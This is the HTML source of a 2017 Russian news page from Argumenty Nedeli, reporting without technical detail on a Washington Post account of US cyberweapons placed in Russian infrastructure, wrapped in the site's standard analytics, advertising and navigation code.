<!DOCTYPE html>
<html>
	<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<meta name='yandex-verification' content='57463a260b82b280' />
	<meta name="google-site-verification" content="tossbk_I2eb3-RB8DxVbAUYPewK5KDyj6bnrnKC8-eU" />
	<meta name="mailru-verification" content="1505d3c11701cb6c" />
	<meta name="dumedia-verify" content="df31ef70be34">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
	<meta name="757a66e838ed83d5840779983391e519" content="">
	<title>СМИ узнали о разработке США направленной против России &laquo;цифровой бомбы&raquo; - Аргументы Недели</title><meta name="description" content="В США изготовлена «цифровая бомба», которая в любой момент может быть использована против России. Об этом узнали американские СМИ. Речь идет о размещении кибероружия в системах инфраструктуры РФ. "><meta name="twitter:title" content="СМИ узнали о разработке США направленной против России &laquo;цифровой бомбы&raquo; - Аргументы Недели"><meta name="twitter:image" content="http://argumenti.ru/images/arhnews/539733.jpg"><meta name="og:title" content="СМИ узнали о разработке США направленной против России &laquo;цифровой бомбы&raquo; - Аргументы Недели"><meta name="og:description" content="В США изготовлена «цифровая бомба», которая в любой момент может быть использована против России. Об этом узнали американские СМИ. Речь идет о размещении кибероружия в системах инфраструктуры РФ. "><meta name="og:image" content="http://argumenti.ru/images/arhnews/539733.jpg"><link rel="stylesheet" href="http://argumenti.ru/pub/styles/reset.css" type="text/css"><link rel="stylesheet" href="http://argumenti.ru/pub/styles/mainv.css?ver=33" type="text/css"><link rel="stylesheet" href="http://argumenti.ru/mistakes/static/mistakes.css" type="text/css"><link rel="image_src" href="http://argumenti.ru/images/arhnews/539733.jpg" >	<//base href="http://argumenti.ru/" />
		<link rel="amphtml" href="http://argumenti.ru/world/2017/06/539733/amp">
			    <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css">

	<link title="argumenti_ru" type="application/rss+xml" rel="alternate" href="http://www.argumenti.ru/rss/argumenti_online.xml"/>
	<link rel="icon" type="image/png" href="http://www.argumenti.ru/favicon.ico" />
	<link rel="apple-touch-icon" href="http://www.argumenti.ru/pub/images/apple-touch-icon-iphone.png" />
	<link rel="apple-touch-icon" sizes="72x72" href="http://www.argumenti.ru/pub/images/apple-touch-icon-ipad.png" />
	<link rel="apple-touch-icon" sizes="114x114" href="http://www.argumenti.ru/pub/images/apple-touch-icon-iphone4.png" />
	<link rel="apple-touch-icon" sizes="144x144" href="http://www.argumenti.ru/pub/images/apple-touch-icon-ipad3.png" />

		



	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
	<script language="JavaScript" src="http://argumenti.ru/pub/js/argumenti_21.js?ver=1"></script>
	<script language="JavaScript" src="http://argumenti.ru/mistakes/static/mistakes_2.js"></script>
	<script type="text/javascript" src="http://argumenti.ru/pub/js/jdropdowns/jquery.dropdownPlain.js"></script>
	<script type="text/javascript" src="http://argumentiru.com/pub/js/jscroller-0.4.js"></script>
	<script language="JavaScript" src="http://argumenti.ru/pub/js/jquery.jcarousel.min.js"></script>
	<script language="JavaScript" src="http://argumenti.ru/pub/js/jquery.validate.min.js"></script>
	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.5.3/jquery-ui.min.js"></script>
    <script type="text/javascript" src="http://argumenti.ru/pub/js/tinycarusel.js"></script>
<script type="text/javascript" src="http://argumentiru.com/pub/js/adfox.asyn.code.scroll/adfox.asyn.code.ver3.js"></script>
		<script type="text/javascript" src="http://argumentiru.com/pub/js/adfox.asyn.code.scroll/adfox.asyn.code.scroll.js"> </script>
<!-- Put this script tag to the <head> of your page -->
<script type="text/javascript" src="https://vk.com/js/api/share.js?94" charset="windows-1251"></script>
<script id="my-widget-script" async
        src="https://likemore-go.imgsmail.ru/widget.js"
        data-uid="9f8d155b17e468abed8b96495fb48897">
</script>
	</head>

			<body>
	
<!-- create page: 17:06:48 06.23.17 -->

<!-- Yandex.Metrika counter  ONLINE -->
<script type="text/javascript">
(function (d, w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter26004090 = new Ya.Metrika({id:26004090,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true});
        } catch(e) { }
    });

    var n = d.getElementsByTagName("script")[0],
        s = d.createElement("script"),
        f = function () { n.parentNode.insertBefore(s, n); };
    s.type = "text/javascript";
    s.async = true;
    s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";

    if (w.opera == "[object Opera]") {
        d.addEventListener("DOMContentLoaded", f, false);
    } else { f(); }
})(document, window, "yandex_metrika_callbacks");
</script>
<noscript><div><img src="//mc.yandex.ru/watch/26004090" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
<!--Desktop--!>
<!-- Rating@Mail.ru counter -->
<script type="text/javascript">
var _tmr = window._tmr || (window._tmr = []);
_tmr.push({id: "2828898", type: "pageView", start: (new Date()).getTime()});
(function (d, w, id) {
  if (d.getElementById(id)) return;
  var ts = d.createElement("script"); ts.type = "text/javascript"; ts.async = true; ts.id = id;
  ts.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//top-fwz1.mail.ru/js/code.js";
  var f = function () {var s = d.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ts, s);};
  if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); }
})(document, window, "topmailru-code");
</script><noscript><div style="position:absolute;left:-10000px;">
<img src="//top-fwz1.mail.ru/counter?id=2828898;js=na" style="border:0;" height="1" width="1" alt="Рейтинг@Mail.ru" />
</div></noscript>
<!-- //Rating@Mail.ru counter --><header>
<nav>
<div class="menu_wrapper">
<div class="menuToggle"><i class="fa fa-bars" aria-hidden="true"></i></div>
	<ul id="dropdown" class="dropdown">
	    <li><a href="http://argumenti.ru/">Главная страница</a></li>
		<li class="desc_hidden"><a href="http://argumenti.ru/news">Все новости</a></li>
		<li><a href="http://argumenti.ru/online">АН - Онлайн</a></li>
		<li><a href="http://argumenti.ru/live">АН LIVE</a></li>
		<li><a href="http://argumenti.ru/region/spb">АН - CПб</a></li>
		<li><a href="http://an-crimea.ru/" rel='nofollow'>АН - Крым</a></li>
		<li><a href="http://argumenti.ru/region/ekb">АН - Екб</a></li>
		<li><a href="http://argumenti.ru/udobreniya">Биоклад</a></li>
		<li class="greenbuy mob_hidden"><a href="http://argumenti.ru/an">АН-Подписка</a></li>
	</ul>
	<ul id="dropdown" class="dropdown desc_hidden">
	    <li class="submenu_name">Рубрики</li>
		<li><a href="http://argumenti.ru/politics">Политика</a></li>
		<li><a href="http://argumenti.ru/economics">Экономика</a></li>
		<li><a href="http://argumenti.ru/society">Общество</a></li>
		<li><a href="http://argumenti.ru/world">В мире</a></li>
		<li><a href="http://argumenti.ru/social">Соцпакет</a></li>
		<li><a href="http://argumenti.ru/pravoved">Правовед</a></li>
		<li><a href="http://argumenti.ru/rassledovanie">Расследования</a></li>
		<li><a href="http://argumenti.ru/hitech">Хайтек</a></li>
		<li><a href="http://argumenti.ru/gorodm">Город&nbsp;М</a></li>
		<li><a href="http://argumenti.ru/earth"><nobr>Сад-огород</nobr></a></li>
		<li><a href="http://argumenti.ru/espionage">Шпионаж</a></li>
		<li><a href="http://argumenti.ru/scandal">Скандал</a></li>
		<li><a href="http://argumenti.ru/sport">Спорт</a></li>
		<li><a href="http://argumenti.ru/crime">Криминал</a></li>
		<li><a href="http://argumenti.ru/culture">Культура</a></li>
		<li><a href="http://argumenti.ru/showbiz"><nobr>Шоубиз</nobr></a></li>
		<li><a href="http://argumenti.ru/health">Здоровье</a></li>
		<li><a href="http://argumenti.ru/history">История</a></li>
		<li><a href="http://argumenti.ru/education">Образование</a></li>
		<li><a href="http://argumenti.ru/tourism">Туризм</a></li>
		<li><a href="http://argumenti.ru/army">Армия</a></li>
	</ul>	
</div>
</nav>
<div id="star">
			<ul>
																								<li id="72875">
																<a href="http://argumenti.ru/politics/2017/06/539675?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/5f74356273567e9c9672374dc74ad563.jpg" width="70" height="70" alt="Пушков прокомментировал продление ЕС санкций против России" />
																					<p>Пушков прокомментировал продление ЕС санкций против России</p></a>	
						</li>

																								<li id="72878" >
																								<a href="http://argumenti.ru/society/2017/06/539698?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/6e122b02eee6be77a244d0754ab6268b.jpg" width="70" height="70" alt="Путин призвал российских выпускников не бояться своих амбиций (ВИДЕО)" />
																<p>Путин призвал российских выпускников не бояться своих амбиций</p></a>
								
						</li>
																									<li id="72881">
																<a href="http://argumenti.ru/society/2017/06/539712?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/08133fd79c5e7cb675fc633a35cef53f.jpg" width="70" height="70" alt="В рамках программы реновации в Москве на крышах домов появятся сады" />
																					<p>В рамках программы реновации в Москве на крышах домов появятся сады</p></a>	
						</li>

																								<li id="72877" class="end">
																								<a href="http://argumenti.ru/meteo/2017/06/539695?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=top" target="_self"><img src="http://argumenti.ru/images/preview/arhnews/1aec6f0bd168995a795f66c8bc0ed056.jpg" width="70" height="70" alt="Какую погоду в выходные ждать в Москве" />
																<p>Какую погоду в выходные ждать в Москве</p></a>
								
						</li>
												</ul>
		</div></header>
        
<div class="container">
	<div class="content">
		<!-- логотип -->

		<div id="corp">
							<a href="http://argumenti.ru/" id="an_logo"><img alt="Аргументы Недели (argumenti.ru)" src="http://www.argumenti.ru/images/argumenti/AN2.gif"/></a>
					<div id="search_time">

																<a href="http://argumenti.ru/an"><div class="newnum2"></div></a>
								


<div class="ya-site-form ya-site-form_inited_no" onclick="return {'action':'http://argumenti.ru/search','arrow':false,'bg':'transparent','fontsize':12,'fg':'#000000','language':'ru','logo':'rb','publicname':'Yandex Site Search #2186328','suggest':true,'tld':'ru','type':2,'usebigdictionary':true,'searchid':2186328,'webopt':false,'websearch':false,'input_fg':'#000000','input_bg':'#ffffff','input_fontStyle':'normal','input_fontWeight':'normal','input_placeholder':'Поиск...','input_placeholderColor':'#000000','input_borderColor':'#7f9db9'}">
	<form action="http://yandex.ru/sitesearch" method="get" target="_blank">
		<input type="hidden" name="searchid" value="2186328"/>
		<input type="hidden" name="l10n" value="ru"/>
		<input type="hidden" name="reqenc" value=""/>
		<input type="search" name="text" value=""/>
		<input type="submit" value="Найти"/>
	</form></div><style type="text/css">.ya-page_js_yes .ya-site-form_inited_no { display: none; }</style><script type="text/javascript">(function(w,d,c){var s=d.createElement('script'),h=d.getElementsByTagName('script')[0],e=d.documentElement;if((' '+e.className+' ').indexOf(' ya-page_js_yes ')===-1){e.className+=' ya-page_js_yes';}s.type='text/javascript';s.async=true;s.charset='utf-8';s.src=(d.location.protocol==='https:'?'https:':'http:')+'//site.yandex.net/v2.0/js/all.js';h.parentNode.insertBefore(s,h);(w[c]||(w[c]=[])).push(function(){Ya.Site.Form.init()})})(window,document,'yandex_site_callbacks');</script>

	</div>
		<div class="soc_reg">

            <ul id="socnets" style="width:100%">
				<li><a class="vk" target="_blank" href="http://vkontakte.ru/club14409962" rel="nofollow"></a></li>
				<li><a class="tw" target="_blank" href="http://twitter.com/argumenti" rel="nofollow"></a></li>
				<li><a class="fb" target="_blank" href="https://www.facebook.com/argumentinedeli" rel="nofollow"></a></li>
				<li><a class="mt2" target="_blank" href="http://argumenti.mirtesen.ru/" rel="nofollow"></a></li>
				<li><a class="ok" target="_blank" href="http://www.odnoklassniki.ru/argumenti" rel="nofollow"></a></li>
			</ul>


			<div id="parts">
		<select id="Regions" onchange="window.location.href=this.options[this.selectedIndex].value">
			<option value="">Регион</option>
			<option value="http://argumenti.ru/">Вся Россия</option>
								
				<option value="http://argumenti.ru/region/altay">Алтайский край</option>
								
				<option value="http://argumenti.ru/region/baltiya">Балтия</option>
								
				<option value="http://argumenti.ru/region/belrus">Белоруссия</option>
								
				<option value="http://argumenti.ru/region/vladivostok">Владивосток</option>
								
				<option value="http://argumenti.ru/region/volgograd">Волгоград</option>
								
				<option value="http://argumenti.ru/region/vyatka">Вятка</option>
								
				<option value="http://argumenti.ru/region/ekb">Екатеринбург</option>
								
				<option value="http://argumenti.ru/region/irkutsk">Иркутск</option>
								
				<option value="http://argumenti.ru/region/kamchatka">Камчатка</option>
								
				<option value="http://argumenti.ru/region/krasnoyarsk">Красноярск</option>
								
				<option value="http://an-crimea.ru/">Крым</option>
								
				<option value="http://argumenti.ru/region/kursk">Курск</option>
								
				<option value="http://argumenti.kg/">Кыргызстан</option>
								
				<option value="http://argumenti.ru/region/lipetsk">Липецк</option>
								
				<option value="http://argumenti.ru/region/murmansk">Мурманск</option>
								
				<option value="http://argumenti.ru/region/novosib">Новосибирск</option>
								
				<option value="http://argumenti.ru/region/orel">Орел</option>
								
				<option value="http://argumenti.ru/region/penza">Пенза</option>
								
				<option value="http://argumenti.ru/region/perm">Пермь</option>
								
				<option value="http://argumenti.ru/region/petrozavodsk">Петрозаводск</option>
								
				<option value="http://argumenti.ru/region/petropavlovsk">Петропавловск-К</option>
								
				<option value="http://argumenti.ru/region/spb">Санкт-Петербург</option>
								
				<option value="http://argumenti.ru/region/sakhlin">Сахалин</option>
								
				<option value="http://argumenti.ru/region/kavkaz">Северный Кавказ</option>
								
				<option value="http://argumenti.ru/region/tatarstan">Татарстан</option>
								
				<option value="http://argumenti.ru/region/tver">Тверь</option>
								
				<option value="http://argumenti.ru/region/ural">Урал</option>
								
				<option value="http://argumenti.ru/region/chelyabinsk">Челябинск</option>
								
				<option value="http://argumenti.ru/region/yakutsk">Якутск</option>
								
				<option value="http://argumenti.ru/region/yaroslavl">Ярославль</option>
				
		</select>
	</div>        </div>

		</div>

		<div class="new_corp">
								<div id="menus">
		<ul class="mainmenu">
			<li><a href="http://argumenti.ru/politics">Политика</a></li>
			<li><a href="http://argumenti.ru/economics">Экономика</a></li>
			<li><a href="http://argumenti.ru/society">Общество</a></li>
			<li><a href="http://argumenti.ru/world">В мире</a></li>
			<li><a href="http://argumenti.ru/social">Соцпакет</a></li>
			<li><a href="http://argumenti.ru/pravoved">Правовед</a></li>
			<li><a href="http://argumenti.ru/rassledovanie">Расследования</a></li>
			<li><a href="http://argumenti.ru/gorodm">Город&nbsp;М</a></li>
			<li><a href="http://argumenti.ru/earth"><nobr>Сад-огород</nobr></a></li>
			<li><a href="http://argumenti.ru/espionage">Шпионаж</a></li>
			<li><a href="http://argumenti.ru/scandal">Скандал</a></li>
			<li><a style="color:red;"  href="http://argumenti.ru/sport">Спорт</a></li>
		</ul>
		<ul class="mainmenu">
			<li><a href="http://argumenti.ru/crime">Криминал</a></li>
			<li><a href="http://argumenti.ru/culture">Культура</a></li>
			<li><a href="http://argumenti.ru/showbiz"><nobr>Шоубиз</nobr></a></li>
			<li><a href="http://argumenti.ru/health">Здоровье</a></li>
			<li><a href="http://argumenti.ru/history">История</a></li>
			<li><a href="http://argumenti.ru/education">Образование</a></li>
			<li><a href="http://argumenti.ru/tourism">Туризм</a></li>
			<li><a href="http://argumenti.ru/army">Армия</a></li>
			<li><a href="http://argumenti.ru/na">Нацакцент</a></li>
			<li><a href="http://argumenti.ru/novoe_pokolenie">Новое поколение</a></li>
			<li><a href="http://argumenti.ru/hitech">Хайтек</a></li>
			<li><a style="color:red;" href="http://argumenti.ru/charity">Сможем вместе</a></li>
		</ul>
</div>
		<!-- Rating@Mail.ru counter -->
<script type="text/javascript">//<![CDATA[
var _tmr = _tmr || [];
_tmr.push({id: "1069168", type: "pageView", start: (new Date()).getTime()});
(function (d, w) {
   var ts = d.createElement("script"); ts.type = "text/javascript"; ts.async = true;
   ts.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//top-fwz1.mail.ru/js/code.js";
   var f = function () {var s = d.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ts, s);};
   if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); }
})(document, window);
//]]></script><noscript><div style="position:absolute;left:-10000px;">
<img src="//top-fwz1.mail.ru/counter?id=1069168;js=na" style="border:0;" height="1" width="1" alt="Рейтинг@Mail.ru" />
</div></noscript>
<!-- //Rating@Mail.ru counter -->

		</div>


			<div id="left">

		
		
			<!-- Яндекс.Директ -->
<div id="yandex_ad"></div>
<script type="text/javascript">
(function(w, d, n, s, t) {
    w[n] = w[n] || [];
    w[n].push(function() {
        Ya.Direct.insertInto(50615, "yandex_ad", {
            ad_format: "direct",
            font_size: 0.8,
            type: "vertical",
            border_type: "block",
            limit: 4,
            title_font_size: 1,
            links_underline: true,
            site_bg_color: "FFFFFF",
            header_bg_color: "FEEAC7",
            bg_color: "EEEEEE",
            border_color: "FBE5C0",
            title_color: "0000CC",
            url_color: "006600",
            text_color: "000000",
            hover_color: "0066FF",
            sitelinks_color: "0000CC",
            favicon: true,
            no_sitelinks: true
        });
    });
    t = d.getElementsByTagName("script")[0];
    s = d.createElement("script");
    s.src = "//an.yandex.ru/system/context.js";
    s.type = "text/javascript";
    s.async = true;
    t.parentNode.insertBefore(s, t);
})(window, document, "yandex_context_callbacks");
</script>

		<div id="titules" style="margin-bottom: 4px;">
		<!--<a href="http://argumenti.ru/numbers/number/566">-->
		
	<a href="http://argumenti.ru/an">
		<IMG c::$content['endnumber'] src="http://argumenti.ru/images/number/595/ec06425a452e94dee963648a968d651b.jpg" alt="Аргументы Недели №566" />
	</a>


		
	</div>

	<!-- подменю -->
	<ul id="corpmenu">
		<!--<li><a href="http://argumenti.ru/numbers/number/566">Купить номер<span class="my_count_number">№24&nbsp;(566)</span></a></li>-->
		<!--  №24&nbsp;(566)?> -->
		<li style="background-color:#2E8B57;"><a style="color:#FFF;" href="http://argumenti.ru/an">Скачать «Аргументы Недели»</a></li>
		<li><a style="color: red; font-size: 0.9em;" href="http://argumenti.ru/udobreniya" rel="nofollow">Проект АН: Биоклад</a></li>
		<li><a href="http://argumenti.ru/novoe_pokolenie">Новое поколение</a></li>
		<!--<li><a href="http://argumenti.ru/numbers">Архив номеров c 2006-2012</a></li>-->
		<li><a href="http://argumenti.ru/live"><span class="live3" style="font-size:110%;">Live</span> - архив</a></li>
		<li><a href="http://argumenti.ru/culture/books/2016/10/469573">Подари детям книгу</a></li>
		<!--<li><a href="http://argumenti.ru/presscenter">Пресс-центр «АН»</a></li>-->
		<li class="live3"><a style="color:white;" href="http://argumenti.ru/allbooks">Электронные книги АН</a></li>
		<li><a style="color: red;" href="http://knigi-an.ru" target="_blank" rel="nofollow">Книги «АН»</a></li>
		<li><a href="http://www.argumenti.ru/reklama/internet.html">Реклама</a></li>
		<li><a href="http://argumenti.ru/subscript">Подписка</a></li>
	
	</ul>


	<script language="JavaScript" type="text/javascript">
		function NewRegion() {
			region_url = $('#Regions option:selected').val();
			if (region_url !='')
				window.location = region_url;
		}
	</script>		


<!-- Крупные preview -->
<!-- По умолчанию -->
		<noindex>
	<h2 class="namerub"><span class="rem">//</span>НАШИ ПАРТНЕРЫ</h2>
	<!-- ex_adv 3 --><a href="" alt="" target="_blank" rel="nofollow"><img src="http://www.argumenti.ru/images/partners/524.gif" width="240" height="100"></a>	<h2 class="namerub"><span class="rem">//</span>Новости</h2>
<div id="smi2adblock_76450"><a href="http://net.finam.ru/" rel="nofollow">Новости net.finam.ru</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.net.finam.ru/data/js/76450.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>

<h2 class="namerub"><span class="rem">//</span>События/Афиша</h2>
<a href="http://teatrpushkin.ru/plays/eta-prekrasnaya-zhizn" rel="nofollow">
<img src="http://argumenti.ru/pub/images/partners/681.gif" width="240" height="240" alt="eta-prekrasnaya-zhizn"  border="0" /></a>



<!-- BEGIN AdMelon http://argumenti.ru (240x400) -->
<script type="text/javascript">
(function() {
    var placeId = 2207, frameId = '_adm_' + placeId + '_iframe', src = document.location.protocol + '//engine.admelon.ru/c?pid=' + placeId + '&rid=' + Math.floor(Math.random() * 1000000000);
    document.write('<div id="_adm_' + placeId + '_div"></div>');
    document.write('<div style="visibility:hidden;position:absolute;"><iframe id="'+ frameId + '" width="1" height="1" marginwidth="0" marginheight="0" scrolling="no" style="border:0;"></iframe></div>');
    var tryCount=0,fn=function(){var a;if(10>tryCount){try{document.all&&!/opera/i.test(navigator.userAgent)?a=window.frames[frameId].document:document.getElementById&&(a=document.getElementById(frameId).contentDocument)}catch(b){}a?a.write(unescape('%3Cscript src="'+src+'" type="text/javascript"%3E%3C/script%3E')):(tryCount++,setTimeout(fn,100))}};fn();})();
</script>
<!-- END AdMelon -->	
	</noindex>
			
	
					<h4 class="namerub"><span class="rem">//</span>Сад и огород</h4>
		<ul class="minf_anons">
							<li><a href="http://argumenti.ru/ad_informer/click/71124" target="_blank"><img src="http://argumenti.ru/images/preview/tabloid/064d2f72276b642e6beffaffe656d0d9.jpg" width="70" height="70" alt="Биоклад"  border="0" /><div class="inf_txt">Советы по посадке картофеля</div></a></li>	
							<li><a href="http://argumenti.ru/ad_informer/click/71442" target="_blank"><img src="http://argumenti.ru/images/preview/tabloid/b507e17e2ea914d0e5f3374bcea75a13.jpg" width="70" height="70" alt="Биоклад"  border="0" /><div class="inf_txt">Агротехника фасоли и бобов</div></a></li>	
					</ul>
	
	
		
		
	
<h2 class="namerub"><span class="rem">//</span>Новости MarketGid</h2>
<!-- MarketGidComposite Start -->
<div id="MarketGidScriptRootC39254">
<div id="MarketGidPreloadC39254">
<a id="mg_add39254" href="http://usr.marketgid.com/demo/goods/" target="_blank" rel="nofollow">Добавить свое объявление</a><br> <a href="http://marketgid.com/" target="_blank" rel="nofollow">Загрузка...</a> 
</div>
<script> 
(function(){
var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
var i=d[ce]('iframe');i[st][ds]=n;d[gi]("MarketGidScriptRootC39254")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><body></body></ht"+"ml>");iw.close();var c=iw[b];}
catch(e){var iw=d;var c=d[gi]("MarketGidScriptRootC39254");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=39254;c[ac](dv);
var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="http://jsc.dt00.net/n/e/news.argumenti.ru.39254.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
</script>
</div>
<!-- MarketGidComposite End -->






<h2 class="namerub"><span class="rem">//</span>новости 24СМИ</h2>
<div id="smi_teaser_2695">
    <center><a href="http://ex.24smi.org" rel="nofollow">новости</a></center>
    </div>

<script type="text/JavaScript" encoding="utf8">
        (function() {
        var sm = document.createElement("script");
        sm.type = "text/javascript";
        sm.async = true;
        sm.src = "http://jsn.24smi.org/d/b/2695.js";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(sm, s);})();
    </script>




<div id="smi2adblock_81550"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = '//js.advert.mirtesen.ru/data/js/81550.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>




	<div>
	

			

<h2 class="namerub"><span class="rem">//</span>Новости news.net.finam.ru</h2>
<div id="smi2adblock_68993"><a href="http://finance.comon.ru/" rel="nofollow">Новости finance.comon.ru</a></div>
<script async type="text/javascript" charset="windows-1251">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.finance.comon.ru/data/js/68993.js'; sc.charset = 'windows-1251';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>







	</div>

		
	<h4 class="namerub"><span class="rem">//</span>Поп-новости</h4>
<ul class="main_inf_anons">
			<li>
							<a href="http://argumenti.ru/showbiz/2017/06/539724">
					<img src="http://argumenti.ru/images/preview/arhnews/7e7a65d18e29ec312fde3b3b980f88db.jpg" alt="Дима Билан высказался о взятках на шоу &quot;Голос&quot;" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2017/06/539724" style="font-size:1.05em;">Дима Билан высказался о взятках на шоу &quot;Голос&quot;</a>
		</li>
			<li>
							<a href="http://argumenti.ru/showbiz/2017/06/539716">
					<img src="http://argumenti.ru/images/preview/arhnews/7999600b650be961b4ac34824e68a785.jpg" alt="Виторган попросил Собчак скрывать измены до последнего" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2017/06/539716" style="font-size:1.05em;">Виторган попросил Собчак скрывать измены до последнего</a>
		</li>
			<li>
							<a href="http://argumenti.ru/showbiz/2017/06/539665">
					<img src="http://argumenti.ru/images/preview/arhnews/ae9c2dced30a83d390eda6cb2cb03484.jpg" alt="Анастасия Волочкова завела Instagram своему коту" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/2017/06/539665" style="font-size:1.05em;">Анастасия Волочкова завела Instagram своему коту</a>
		</li>
			<li>
							<a href="http://argumenti.ru/showbiz/n595/539657">
					<img src="http://argumenti.ru/images/preview/arhnews/4978a777c81b007f1a39af94a486bacb.jpg" alt="Дельфин и Русалка:  &laquo;Сделано в Италии&raquo;" />
				</a>
						
			<a href="http://argumenti.ru/showbiz/n595/539657" style="font-size:1.05em;">Дельфин и Русалка:  &laquo;Сделано в Италии&raquo;</a>
		</li>
	</ul>	<h4 class="namerub"><span class="rem">//</span>Национальный Акцент</h4>
<div id="nazaccent_informer"></div>
<script async type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://media.nazaccent.ru/storage/js/informer.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>



				

		
<!--<h4 class="namerub"><span class="rem">//</span>Наши партнеры</h4>-->


</div>	
		<section id="center">

			<!-- your device: Desktop -->


					<!--noindex-->

	<ul id="topanons">
					<li><span class="news_time">15:42</span><a href="http://argumenti.ru/world/2017/06/539733">СМИ узнали о разработке США направленной против России &laquo;цифровой бомбы&raquo;</a></li>
					<li><span class="news_time">14:38</span><a href="http://argumenti.ru/world/2017/06/539727">Савченко рассказала об обмене нецензурными жестами с Гройсманом в Раде</a></li>
					<li><span class="news_time">14:15</span><a href="http://argumenti.ru/world/2017/06/539725">Экс-глава украинской разведки рассказал о сторонниках РФ в окружении Порошенко</a></li>
					<li><span class="news_time">12:44</span><a href="http://argumenti.ru/world/2017/06/539711">В Еврокомиссии заявили об отсутствии подготовки к введению новых санкций</a></li>
					<li><span class="news_time">12:16</span><a href="http://argumenti.ru/world/2017/06/539707">Азаров назвал подготовку импичмента Порошенко пиар-акцией Тимошенко</a></li>
				<li class="news_arh">
							<a href="http://argumenti.ru/world/news">В мире</a> /
						<a href="http://argumenti.ru/news" style="font-size:1.2em">все новости</a>

		</li>
	</ul>

	<!--/noindex-->		
			<p class="namerub">
			<span class="rem">//</span><a href="http://argumenti.ru/world">В мире</a>
						<span class="agecategory">
									13+
							</span>
		</p>
	
	<article>
	<h1>СМИ узнали о разработке США направленной против России &laquo;цифровой бомбы&raquo;</h1>
	
				<p class="info">
					<span class="number_info">

						



													23&nbsp;июня&nbsp;2017,&nbsp;15:42																			[&nbsp;«Аргументы Недели»&nbsp;]
						
					</span>
				</p>
				<div class="publtxt">
																		<figure id="publ_photo">
																<img src="http://argumenti.ru/images/preview/arhnews/40c5b5507c342bf71bde2c89aeca9803.jpg" alt="СМИ узнали о разработке США направленной против России &laquo;цифровой бомбы&raquo;" />
																									<figcaption>фото: pixabay.com</figcaption>
															</figure>
											

												<div></div>
					
																<div><p><strong>В Соединенных Штатах изготовлена &laquo;цифровая бомба&raquo;, которая в любой момент может быть использована против России. Об этом узнали американские СМИ.</strong></p>
<p>Как пишет The Washington Post, речь идет о размещении кибероружия в системах инфраструктуры РФ. Из опубликованного газетой материала следует, что разработать такое оружие распорядился 44-й президент США Барак Обама. Это стало ответом Белого дома на &laquo;вмешательство&raquo; в американские выборы, в котором якобы замешана Москва.</p>
<p>По данным журналистов, кибероружие было готово к использованию еще прошлой осенью, однако до настоящего момента американцы его в ход не пустили. Издание не исключает, что это может произойти уже при президенте Дональде Трампе, если отношения между США и Россией продолжат ухудшаться. &nbsp;&nbsp;</p>
<p>&nbsp;</p></div>
					
					
				</div>
			</article>
				<div id="publ_panel">

					<p class="er_info"><a href="javascript:void(0)" onclick="winop()">Ошибка в тексте? Пожалуйста, выделите ее и нажмите "Ctrl + Enter"</a>
					<span id="clicks" class="clicks"></span>
					

					<!--<script type="text/javascript">
						 $('#clicks').load('ar_clicks/ar_clicks.php?find=539733&date=2017-06-23');
					</script>--></p>

					<div id = "drop_sub">
						<a href="http://www.argumenti.ru/rss/argumenti_online.xml" target="_blank" rel="nofollow">RSS</a>,
						<a href="javascript:void(0);" onclick="return bookmark(this);">Избранное</a>,
						<a href="http://twitter.com/argumenti" target="_blank" rel="nofollow">Twitter</a>,
